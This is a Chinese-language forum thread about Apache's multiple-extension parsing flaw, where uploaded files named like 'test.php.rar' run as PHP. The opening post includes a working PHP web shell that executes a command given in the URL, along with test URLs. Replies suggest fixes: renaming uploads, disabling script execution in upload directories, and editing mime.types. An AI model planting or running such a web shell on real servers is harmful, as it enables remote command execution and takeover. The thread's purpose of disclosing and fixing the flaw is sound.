关于php apache后缀漏洞 附测试代码
很致命的漏洞,如果你的程序有这方面的问题。主要危害是带上传功能的应用。
如果你是把上传的文件统一改名了还好。
如果没有改名。那么就危险拉。
如果他上传jpg,gif,zip还好说拉。如果他上一个 xxx.php.rar 的文件那么就轻松拿到你的web sheel 拉 。
测试代码:
[code]
<?
if($_GET[comm]!='')
{
exec($_GET[comm],$re);
foreach($re as $v)
echo $v.'<br>';
}
else
exit('Please input command...');
?>
[/code]
以上代码另存为test.php.rar
测试代码:
http://localhost:/test.php.rar?comm=netstat -n
http://localhost:/test.php.rar?comm=ps -A
http://localhost:/test.php.rar?comm=ls
当然他还可以上传一个取消限制的上传工具。在上一些黑客工具,木马后门,到你服务器,慢慢整你。
解决办法:
1.所有上传文件统一修改为你指定的名字。
2.更新新版本php/apache 又发一次:L :L 不错!! 支持啊!! 强!测试了!确实有这个bug! :o 更彻底的办法是放用户上传文件的目录没有脚本执行的能力 这种问题早就有了,不是现在就有,这个是apache的一种解析机制!
如果对于不认识的后缀,apache就会去前面尝试检测是否有认识的后缀!
避免你说的问题,可以修改apache的配置目录下mime.types这个文件
[quote]
apache的目录\conf\mime.types
[/quote]
把rar文件添加到mime.types文件里,那么apache就认识了rar文件,就不会在出现你说的问题!
页:
[1]